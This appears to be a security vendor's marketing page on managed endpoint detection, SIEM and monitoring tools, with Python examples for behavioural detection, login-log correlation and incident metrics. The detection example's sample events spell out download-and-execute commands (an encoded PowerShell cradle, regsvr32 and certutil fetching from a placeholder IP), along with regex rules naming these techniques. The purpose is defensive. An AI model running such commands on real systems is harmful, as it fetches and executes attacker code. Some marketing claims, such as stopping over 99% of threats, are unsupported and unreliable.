  • MDR depends heavily on security event management and advanced analytics.
  • MDR includes incident validation and remote response.

Why Choose Managed Endpoint Security?

Given the current level of cybersecurity breaches, your company’s ability to detect and respond to threats is critical. Lacking the complete picture of what is going on across your environment puts you in a vulnerable position when a threat surfaces.

Managed Endpoint Security Benefits

  • Improved detection capabilities, not just network-based monitoring
  • Identification of threats beyond what traditional preventative security catches
  • Finding the root cause of attacks quickly and effectively
  • Watching for threats with suspicious behavioral patterns
  • Isolating infected hosts from the network

How Secure is EDR?


Technology is becoming increasingly sophisticated, and cybercriminals are getting better at their game to keep up. Cyber threats are evolving, and antivirus no longer offers the level of protection it once did in detecting suspicious activity and protecting your devices against malware. Cybercriminals are deploying advanced threats to get ahead. Verizon’s 2017 Data Breach Investigations Report found that over half of breaches involved malware; one year later, the 2018 Data Breach Investigations Report records only 31% as including malware, a sign that attackers are moving toward techniques that leave nothing for signature-based AV to find.

It is therefore expedient to actively monitor behavioral events at the endpoint level, which is now the new standard. Using EDR security in conjunction with AV lets you detect abnormal behavior, surfacing indicators of compromise that an AV solution alone is not capable of detecting.

3 Types of Attacks That AV Will Not Detect

  1. Zero-day attacks

A zero-day attack exploits a vulnerability for which no patch and no signature yet exist, so it is used before a fix is available. AV may detect a known malware signature (a distinctive sequence of bytes within the malware), but a zero-day attack carrying new or freshly repacked code has no signature to match, and sneaking past traditional AV is an easy feat.

  2. Ransomware attacks

Ransomware typically arrives as software the victim is tricked into running, often through an infected email attachment such as a Microsoft Word document carrying a macro. Signature-based AV frequently fails to stop it, because new variants are repacked faster than signatures can be published, so the malware’s signature is simply not yet recognized.

  3. Fileless malware attacks

Fileless malware attacks abuse legitimate Windows tools that are already present (PowerShell, WMI, scripting hosts) instead of installing malicious software on the victim’s computer. As a result, there is no file on disk for AV to match a signature against.

Why Managed EDR Security Will Detect These Attacks 

EDR security is largely indifferent to which malware or virus was introduced; it cares about the behavior it observes. If that behavior indicates suspicious activity, EDR identifies it and immediately raises an alert. Continued monitoring of the indicators that signal malicious activity then protects against further threats.

AV protection should not be relegated to the background, but combining it with EDR gives a defense-in-depth approach to your overall security apparatus.
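The behavior-first detection described in this section, and the fileless case from the list above, as an added example that is not PREtect's detection logic: a handful of illustrative rules are run over process-creation events. The rules look at who spawned what (an Office application starting a script host), decode a PowerShell -EncodedCommand payload to inspect what it really does, and flag living-off-the-land binaries invoked in ways that have almost no legitimate use. The field names (Image, ParentImage, CommandLine, ProcessId) follow Sysmon Event ID 1, but the events themselves, the IP address and the rule set are constructed for the demonstration.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Living-off-the-land binaries invoked in ways that have almost no legitimate use.
LOLBIN_RULES = {
    "regsvr32_remote_scriptlet": re.compile(r"regsvr32\.exe.*\s/i:https?://", re.I),
    "rundll32_script_protocol": re.compile(r"rundll32\.exe.*\b(?:javascript|vbscript):", re.I),
    "mshta_remote_content": re.compile(r"mshta\.exe.*https?://", re.I),
    "certutil_download": re.compile(r"certutil\.exe.*-urlcache.*\s-f\s", re.I),
}
# Download-and-execute primitives typical of fileless loaders.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string", re.I)
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Apply the behavioral rules to one process-creation event; return the names of rules that fired."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_app_spawned_script_host")
    if image in POWERSHELL:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            if CRADLE.search(decoded):
                hits.append("download_cradle_in_decoded_payload")
        elif CRADLE.search(cmd):
            hits.append("download_cradle")
    for name, pattern in LOLBIN_RULES.items():
        if pattern.search(cmd):
            hits.append(name)
    return hits


def scan(events):
    """Return (ProcessId, fired rules) for every event that tripped at least one rule."""
    alerts = []
    for event in events:
        hits = evaluate(event)
        if hits:
            alerts.append((event["ProcessId"], hits))
    return alerts


def _encode_ps(script):
    # The same transform an attacker uses to build -EncodedCommand; used here only to construct the sample.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 style records: field names are Sysmon's, values are made up.
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')")},
    {"ProcessId": 4420, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"},
    {"ProcessId": 4425, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"ProcessId": 4431, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ProcessId": 4440, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.5/p.exe %TEMP%\p.exe"},
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS):
        print(pid, rules)
```

Note that nothing here hashes a file: the scheduled PowerShell backup and the user opening Notepad produce no alert, while the macro-launched PowerShell is caught three times over even though its payload never touches disk. That is the difference between matching what a file is and watching what a process does.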

Managed EDR Security to boost Existing Security

MDR is offered to augment the existing security infrastructure and contain threats that bypass traditional controls. Threats such as network attacks, fileless malware and targeted attacks are built to be difficult to detect.

Most organizations concentrate on where threats enter and exit the network. More often than not, the lateral movement of a threat once it is inside the environment receives far less attention.

Managed EDR security does not in any way replace traditional anti-virus software; it supplements it. Anti-virus blocks the obvious threat indicators, while the threats that conventional controls cannot tame need continuous detection and response. Detection-focused EDR does not by itself block every threat, but it can carry out root cause analysis and identify the devices that have been compromised.

Typical use cases for Managed Endpoint Detection and Response

  • Identifying and blocking malicious executables
  • Controlling script execution: where, how, and by whom
  • Managing the use of USB devices and preventing the use of unauthorized devices
  • Disabling the techniques attackers rely on for fileless malware attacks
  • Preventing malicious email attachments from executing
  • Identifying and preventing zero-day attacks

Merging SIEM with EDR

Organizations, and even security providers, are gradually moving from SIEM (Security Information and Event Management) to EDR (Endpoint Detection and Response). That may not be the best decision for the security of your IT infrastructure. The two technologies look similar but differ fundamentally: EDR sees process-level activity on the host, while SIEM correlates events across every log source. EDR may be a fantastic technology, but it does not suffice as a replacement for SIEM.

To understand the full scope of an attack quickly, SIEM and EDR can be merged and monitored from a single console.

Why deploy multiple tools, whose integration rarely happens, if you don’t have to?

Traditional SIEMs that depend only on logs and correlation rules find it challenging to detect sophisticated attacks. Combining logs, endpoint data and network packets goes a long way toward automating threat detection and gives the security team the means to investigate advanced attacks. Several SIEMs lack this combination, or ship a weak add-on and call it a complete solution. That is barely sufficient for your infrastructure, and you may soon find yourself in a compromised state.
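What merging the two sources buys you, as an added example (not code from Cybriant or any SIEM vendor): a stateful correlation rule over sshd authentication logs raises a medium-severity alert when a source address succeeds after a burst of failures on the same host, and a join against endpoint process events by the same user on that host in the following minutes escalates it to high. The log lines, the endpoint events, the hosts and the addresses are constructed for the demonstration; the thresholds are illustrative.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})")


def parse_auth(lines):
    """Parse sshd lines into events; lines that do not match are ignored, output is time-ordered."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "host": m["host"],
                           "result": m["result"], "user": m["user"], "src": m["src"]})
    return sorted(events, key=lambda e: e["ts"])


def correlate_bruteforce_success(events, threshold=5, window=timedelta(minutes=10)):
    """Alert when a source succeeds on a host after at least `threshold` failures inside `window`."""
    recent_failures = defaultdict(list)   # (host, src) -> failure timestamps still inside the window
    alerts = []
    for e in events:
        key = (e["host"], e["src"])
        fails = [t for t in recent_failures[key] if e["ts"] - t <= window]
        if e["result"] == "Failed":
            fails.append(e["ts"])
        elif len(fails) >= threshold:
            alerts.append({"host": e["host"], "src": e["src"], "user": e["user"],
                           "ts": e["ts"], "failures": len(fails), "severity": "medium"})
            fails = []   # start counting afresh once reported
        recent_failures[key] = fails
    return alerts


def enrich_with_endpoint(alerts, endpoint_events, lookahead=timedelta(minutes=30)):
    """Join each alert with process starts by the same user on the same host shortly after the login."""
    for a in alerts:
        followups = [ev for ev in endpoint_events
                     if ev["host"] == a["host"] and ev["user"] == a["user"]
                     and a["ts"] <= ev["ts"] <= a["ts"] + lookahead]
        a["endpoint_activity"] = [ev["image"] for ev in sorted(followups, key=lambda ev: ev["ts"])]
        if followups:
            a["severity"] = "high"
    return alerts


# Constructed sshd log lines (ISO timestamp, host, message); not real captures.
AUTH_LOG = """\
2019-03-04T08:55:00 web01 sshd[2101]: Failed password for alice from 203.0.113.9 port 50112 ssh2
2019-03-04T08:55:20 web01 sshd[2101]: Accepted password for alice from 203.0.113.9 port 50112 ssh2
2019-03-04T09:00:01 web01 sshd[2188]: Failed password for root from 198.51.100.7 port 41022 ssh2
2019-03-04T09:00:09 web01 sshd[2190]: Failed password for invalid user admin from 198.51.100.7 port 41030 ssh2
2019-03-04T09:00:18 web01 sshd[2192]: Failed password for invalid user test from 198.51.100.7 port 41041 ssh2
2019-03-04T09:00:27 web01 sshd[2194]: Failed password for deploy from 198.51.100.7 port 41055 ssh2
2019-03-04T09:00:38 web01 sshd[2196]: Failed password for deploy from 198.51.100.7 port 41063 ssh2
2019-03-04T09:00:50 web01 sshd[2198]: Failed password for deploy from 198.51.100.7 port 41070 ssh2
2019-03-04T09:01:10 web01 sshd[2200]: Accepted password for deploy from 198.51.100.7 port 41077 ssh2
2019-03-04T09:05:00 db01 sshd[3310]: Failed password for root from 198.51.100.7 port 41090 ssh2
2019-03-04T09:05:07 db01 sshd[3312]: Failed password for root from 198.51.100.7 port 41094 ssh2
""".splitlines()

# Constructed endpoint process-start events from the same hosts.
ENDPOINT_EVENTS = [
    {"host": "web01", "ts": datetime(2019, 3, 4, 9, 2, 30), "user": "deploy", "image": "/usr/bin/curl"},
    {"host": "web01", "ts": datetime(2019, 3, 4, 9, 2, 45), "user": "deploy", "image": "/bin/bash"},
    {"host": "web01", "ts": datetime(2019, 3, 4, 10, 30, 0), "user": "deploy", "image": "/usr/bin/vim"},
    {"host": "db01", "ts": datetime(2019, 3, 4, 9, 3, 0), "user": "postgres", "image": "/usr/bin/psql"},
]


def demo():
    alerts = correlate_bruteforce_success(parse_auth(AUTH_LOG))
    return enrich_with_endpoint(alerts, ENDPOINT_EVENTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Alice's single typo and the two stray root attempts on db01 never reach the threshold, so the only alert is the deploy login from 198.51.100.7, and it is the endpoint data (curl followed by a shell under that account) that turns a "someone finally guessed a password" event into something an analyst picks up first.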

As cyber threats continue to manifest in different ways, your security strategy should be fine-tuned to current challenges. While endpoint security may be vital to your IT architecture, you also need to ensure that emerging threats and unwanted applications are not jeopardizing your company’s reputation or profits. Having a system that detects and responds rapidly to modern-day threats is not up for debate.


The Ultimate List of Effective Cyber Security Monitoring Tools

Are you prepared to defend your entire organization against the bad guys? Check out our list of cyber security monitoring tools to be sure. 

Cyber Security Monitoring is a huge responsibility for every business no matter the size. You must be prepared to defend against malware, hackers, internal sources, and so much more.

Be sure you have these cyber security monitoring tools in place:


Security Information and Event Management (SIEM) – A SIEM platform centrally collects data from multiple devices on your network, including your existing security appliances. Through an advanced correlation engine, it is able to proactively identify security events not otherwise detected by standalone security technology.

A SIEM system centralizes logging capabilities on security events for enterprises and is principally used to analyze and/or report on the log entries received. The analysis capabilities of SIEM systems can detect attacks not discovered through other means and can direct the reconfiguration of other enterprise security controls to plug holes in enterprise security. Some of the top SIEM products — assuming an attack is still in progress — can even stop detected security breaches.

SIEM is one of the ultimate cyber security monitoring tools. It collects data in multiple ways from your systems and network, including your existing security appliances, and gives a “big picture” view of all your security events. With the right security experts monitoring your SIEM, you’ll know when and where an event occurs.

Managed SIEM is included in PREtect CORE.

Free Research Tools

Many free research tools are available for investigating cybersecurity threats, and they are effective cyber security monitoring tools in their own right. The key factor is that the person doing the research needs a comprehensive knowledge of all the pieces involved. AlienVault Open Threat Exchange is the neighborhood watch of the global intelligence community. It enables private companies, independent security researchers, and government agencies to openly collaborate and share the latest information about emerging threats, attack methods, and malicious actors, promoting greater security across the entire community.


Trained Experts

Of all the cyber security monitoring tools available, having a trained expert on your team could be one of the most critical. A common mistake we see is organizations adding cyber security monitoring to the plate of an already overstretched IT team. Untrained employees are unable to resolve cyber security issues immediately, or even to know what to look for.

At Cybriant, we recommend outsourcing to a professional cyber security monitoring company like us. The Cybersecurity experts on our team are professionals who have attained specialized in-depth expertise and proven knowledge in the essential areas of proactive cyber threat detection and mitigation. Our cyber security experts act as an extension of your IT team, understand your infrastructure, and are ready to defend your network.


Network Traffic Analysis Framework

With the growth of internet-based services, network traffic data has become so large and complex that it is very difficult to process with traditional data processing tools. Cyber security monitoring is a major problem for organizations that carry a large amount of network traffic. Fast and efficient intrusion detection is challenging precisely because of the size and complexity of that data. A realistic intrusion detection system must process large volumes of network traffic as quickly as possible in order to detect malicious traffic as early as possible.

Cybriant helps defend your network through our tiered PREtect services.


Disassembler

A disassembler is a program that converts machine code into a low-level symbolic language that a human can read, which makes it a reverse engineering tool for cyber security monitoring. Reverse engineering was traditionally associated with hardware, but the same discipline applies to software. With a disassembler, reverse engineering can recover the details of a breach: how the attacker entered the system and what steps were taken once inside. IDA is the best-known disassembler; for Android packages, Apktool and dex2jar fill a similar role by recovering readable code from compiled apps.

Mean Time to Detect (MTTD) and Mean Time to Respond

Any organization that is serious about its cyber security will have a thorough understanding of its current Mean Time to Detect and Mean Time to Respond metrics. MTTD and MTTR are vital cyber security monitoring tools.

  • Mean time to detect is the average time it takes your team to discover a potential security incident.
  • Mean time to respond is the average time it takes to control, remediate and/or eradicate a threat once it has been discovered.

A team of experts should review security events daily, and you should work to reduce your mean time to detect. When you detect a risk, resolve it immediately and reduce your mean time to respond as well. The core metrics many security teams use to measure their effectiveness are MTTD and MTTR: once the team detects a threat and raises an alert, what matters is how much time is spent containing and remediating it.
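How the two metrics are actually derived from an incident register, as an added example that is not Cybriant's reporting code: each incident carries the time the malicious activity began (from the forensic timeline), the time it was first detected, and the time it was contained, which is empty while the incident is still open. Open incidents count toward MTTD but are excluded from MTTR rather than silently treated as zero, the median is reported beside the mean because one long-undetected intrusion distorts the average, and a second function lists the incidents that blew through a detection or response target. The incident records, the report time and the targets are constructed for the demonstration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import mean, median
from typing import Optional


@dataclass
class Incident:
    ident: str
    occurred_at: datetime                     # first malicious activity, from the forensic timeline
    detected_at: datetime                     # first alert or analyst observation
    contained_at: Optional[datetime] = None   # None while the incident is still open


def _hours(delta: timedelta) -> float:
    return delta.total_seconds() / 3600.0


def compute_metrics(incidents):
    """MTTD and MTTR in hours. Open incidents count toward MTTD but not MTTR."""
    for inc in incidents:
        if inc.detected_at < inc.occurred_at:
            raise ValueError(f"{inc.ident}: detected before it occurred; check the timeline")
        if inc.contained_at is not None and inc.contained_at < inc.detected_at:
            raise ValueError(f"{inc.ident}: contained before it was detected")
    time_to_detect = [_hours(i.detected_at - i.occurred_at) for i in incidents]
    closed = [i for i in incidents if i.contained_at is not None]
    time_to_respond = [_hours(i.contained_at - i.detected_at) for i in closed]
    return {
        "incidents": len(incidents),
        "open": len(incidents) - len(closed),
        "mttd_hours": mean(time_to_detect) if time_to_detect else None,
        "median_ttd_hours": median(time_to_detect) if time_to_detect else None,
        "mttr_hours": mean(time_to_respond) if time_to_respond else None,
        "median_ttr_hours": median(time_to_respond) if time_to_respond else None,
    }


def sla_breaches(incidents, now, detect_within=timedelta(hours=24), respond_within=timedelta(hours=8)):
    """Incidents that exceeded the detection or response target; open ones are measured up to `now`."""
    breaches = []
    for inc in incidents:
        if inc.detected_at - inc.occurred_at > detect_within:
            breaches.append((inc.ident, "detect"))
        if (inc.contained_at or now) - inc.detected_at > respond_within:
            breaches.append((inc.ident, "respond"))
    return breaches


# Constructed incident records for the demonstration; not data from any real environment.
SAMPLE_INCIDENTS = [
    Incident("INC-1", datetime(2019, 3, 1, 8, 0), datetime(2019, 3, 1, 10, 0), datetime(2019, 3, 1, 14, 0)),
    Incident("INC-2", datetime(2019, 2, 10, 0, 0), datetime(2019, 3, 2, 9, 0), datetime(2019, 3, 4, 9, 0)),
    Incident("INC-3", datetime(2019, 3, 5, 12, 0), datetime(2019, 3, 5, 12, 30)),          # still open
    Incident("INC-4", datetime(2019, 3, 6, 0, 0), datetime(2019, 3, 6, 6, 0), datetime(2019, 3, 6, 7, 0)),
]
REPORT_TIME = datetime(2019, 3, 6, 12, 0)


def demo_metrics():
    return compute_metrics(SAMPLE_INCIDENTS)


def demo_breaches():
    return sla_breaches(SAMPLE_INCIDENTS, now=REPORT_TIME)


if __name__ == "__main__":
    for key, value in demo_metrics().items():
        print(f"{key}: {value}")
    print("SLA breaches:", demo_breaches())
```

On this register the mean time to detect is about 124 hours while the median is 4 hours: the single intrusion that sat unnoticed for three weeks (INC-2) dominates the average, which is exactly the kind of incident the daily review is meant to surface early.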

Trained Employees

No matter the size of your organization, we can probably guess that your employees aren’t trained well enough on cybersecurity and IT security. Hackers are getting increasingly good at crafting convincing emails personalized for your employees. How can you train them effectively? It should come from the top down. Make security a priority in your organization.

Several online platforms offer basic security training for employees. KnowBe4 allows your organization to “phish your users” so you know which employees are the most phish-prone and which ones should receive the most training.


AI to Prevent Malware from Executing

Many organizations think that their antivirus software is enough to keep them safe. Unfortunately, that’s not always the case. Antivirus isn’t enough to protect endpoints.

The underlying technology for Cybriant’s Managed EDR service is the only technology that stops over 99% of advanced threats and malware before they can execute to cause harm. It completely eliminates the need for legacy antivirus software, anti-exploit products, whitelisting solutions, and host-based intrusion detection and prevention systems.

Cybriant uses a “prevention-first” technology: we stop attacks before they cause harm, rather than allowing attacks to happen and then cleaning up the mess. By reducing the number of endpoint security products deployed on the endpoint, customers gain operational efficiencies by not having to manage signatures, policies, or deployments of additional protection.

This service is included in PREtect PREMIUM

Privileged identity management (PIM)

Privileged identity management is also a key cyber security monitoring tool. PIM, highly recommended by cybersecurity experts, stores privileged account passwords in a dedicated vault, brokers access to them, and rotates each password after use or on a schedule. A privileged credential that an attacker manages to capture therefore stops working quickly, and every privileged session is recorded, which protects confidential data from theft. PIM is also cost-effective and can save you money.

Patch Management

Patches are pieces of code used to update your company’s software to the latest versions, which are more effective and fix known vulnerabilities. A responsive patch management solution will scan your systems, check for missing and available patches against our comprehensive vulnerability database, download and deploy missing patches and service packs, and generate reports to manage the patch management process of the enterprise effectively. Patch management is simply the practice of keeping software updated with new code, and it is highly effective alongside cyber security monitoring.

This service is included in PREtect ADVANCED.

Insider Threat Detection

Insider threat detection is also a major problem to face today, and it means paying attention to your own employees. You must detect threats from inside, because some malicious users with access to private information want to steal it. There are also negligent users who do not deliberately expose data, but whose carelessness can expose it to outsiders, costing the company its protection and some private or confidential files.

Check your vulnerabilities

Performing only a single vulnerability scan each year or quarter puts organizations at risk of not uncovering new vulnerabilities. The time between scans is all an attacker needs to compromise a network. With continuous scanning, our security experts automatically have the visibility to assess whether each asset is secure or exposed.

Vulnerabilities are the weaknesses through which your networks face danger, whether from an opportunistic malware outbreak or a targeted attack. So examine your network to find those weaknesses and their remediation. Being able to confidently visualize, analyze, and measure your vulnerabilities is a tool for reducing cyber risk. Identifying vulnerabilities and having a system in place to patch them makes for incredibly effective cyber security monitoring tools.


With 3 Levels of Protection, PREtect covers all your Cyber Security Monitoring Tools